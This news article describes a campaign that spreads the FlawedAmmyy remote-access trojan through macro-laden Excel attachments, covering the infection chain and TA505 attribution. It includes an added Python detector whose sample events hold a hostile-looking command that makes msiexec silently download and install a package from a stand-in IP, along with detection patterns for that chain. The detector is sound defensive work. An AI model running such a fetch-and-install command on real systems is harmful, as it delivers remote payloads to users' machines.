Microsoft Warns Users Not to Enable Macros, or They Could Be Hit by Malware
Malware threats are becoming more of an issue with each passing year. The threat is evolving at a rapid pace, with attackers constantly developing new, more advanced forms of malicious software that spreads in any way it can find. The innovative ways of spreading and infecting internet users are eventually discovered, but a lack of awareness may cause many to end up infected, even if their devices are fully patched.
According to Microsoft, there is currently a new Windows malware campaign that spreads through Excel attachments sent by email, each carrying a malicious macro. Because of that, Microsoft warned users, urging them not to enable macros at all until the new campaign that relies on Office features is dealt with.
Considering the popularity of Microsoft Office applications around the world, it is clear why attackers focused their efforts on creating malware that could misuse these features for spreading. Unfortunately, some of the most widely used Office features are now being abused and could infect large numbers of Windows PCs, even ones that are fully patched and protected.
The only way for Microsoft to protect its users was to raise awareness and warn them of the new threat, and so the company warned against enabling macros in Office. Earlier this month, the tech giant said that attackers are sending spam that exploits a flaw in Office, which results in the installation of a trojan. It was also discovered that, because of that bug, attackers do not need users to enable macros in the first place.
But, according to the new information, there is now a new malware campaign that takes the opposite approach and uses the macro function in Excel to compromise devices. In other words, there is no specific vulnerability that can be patched: the campaign exploits a legitimate feature in an Excel attachment.
As reported by the company’s Security Intelligence team, this new campaign uses a complex infection chain in order to download and run what is known as FlawedAmmyy. This is a remote-access trojan, or RAT, which is loaded directly into the infected PC’s memory. This is not a new RAT; it has been used many times in the past, mostly against businesses in the retail and finance industries.
According to Proofpoint, a well-known security firm, it is likely that the hacking group responsible for the attack is TA505. This is a group that often relies on Microsoft Office attachments, as well as social engineering, to infect the systems of others.
Experts also explained the attack, noting that it starts with an email carrying an Excel (.xls) attachment. This is the kind of attachment that Microsoft warns people not to open under any circumstances. However, in cases where the attachment does get opened, the file will start running a macro that launches msiexec.exe, which then downloads an MSI installer package.
After that, the MSI package extracts a digitally signed executable contained within it and runs it. This executable decrypts and runs another executable in the device’s memory. All of this allows the malware to avoid detection, even if users have a fully updated antivirus. But that is not the end of the process either, as the malicious executable then downloads a file called wsus.exe, which is then decrypted.
This file is designed to look like Microsoft Windows Server Update Services, or WSUS. The file then decrypts the payload in RAM, and the FlawedAmmyy payload is delivered.
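As an added defender-side example (not code from the article, Microsoft, Proofpoint or TrendMicro), the following Python scores Sysmon-style process-creation events against the chain described above: an Office application launching msiexec.exe with a remote URL, msiexec.exe spawning a child from a user-writable path, and a binary named wsus.exe. The sample events, paths and URL are constructed, the field names follow Sysmon Event ID 1 conventions, and it is an assumption that no legitimate wsus.exe runs on a workstation.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i http://203.0.113.10/update.msi /q"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Users\alice\AppData\Local\Temp\wsus.exe",
     "CommandLine": r"wsus.exe"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\wuauclt.exe",
     "CommandLine": r"wuauclt.exe /detectnow"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path, independent of host OS."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the names of the rules an event matches (empty if benign)."""
    hits = []
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmd = event.get("CommandLine", "")
    # Rule 1: Office app launching msiexec.exe with a remote URL, the
    # macro-to-MSI step in the chain. Local .msi installs are not flagged.
    if parent in OFFICE_APPS and image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("office_spawns_msiexec_url")
    # Rule 2: msiexec.exe spawning a child from a user-writable location.
    if parent == "msiexec.exe" and "\\appdata\\" in event["Image"].lower():
        hits.append("msiexec_child_from_appdata")
    # Rule 3: binary named after WSUS. Assumption: no legitimate wsus.exe
    # is expected to run on a workstation.
    if image == "wsus.exe":
        hits.append("wsus_masquerade")
    return hits


def scan(events):
    """Map event index to matched rules, keeping only suspicious events."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```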
So far, it appears that the attack is mostly targeting Korean speakers, a conclusion drawn from the Korean-language text in the attachment. Meanwhile, Microsoft is investing in the infrastructure of its Windows Defender, hoping to improve the built-in antivirus and make it a better obstacle for malware.
Another security company, TrendMicro, recently pointed out that TA505 appears to be targeting Windows users in a few specific locations, including China, Taiwan, Chile, Mexico, and South Korea, which supports the view that the malware may only be aimed at South Koreans at this time. However, if TrendMicro is right, it is possible that Windows users in the other listed regions might start experiencing similar issues in the near future.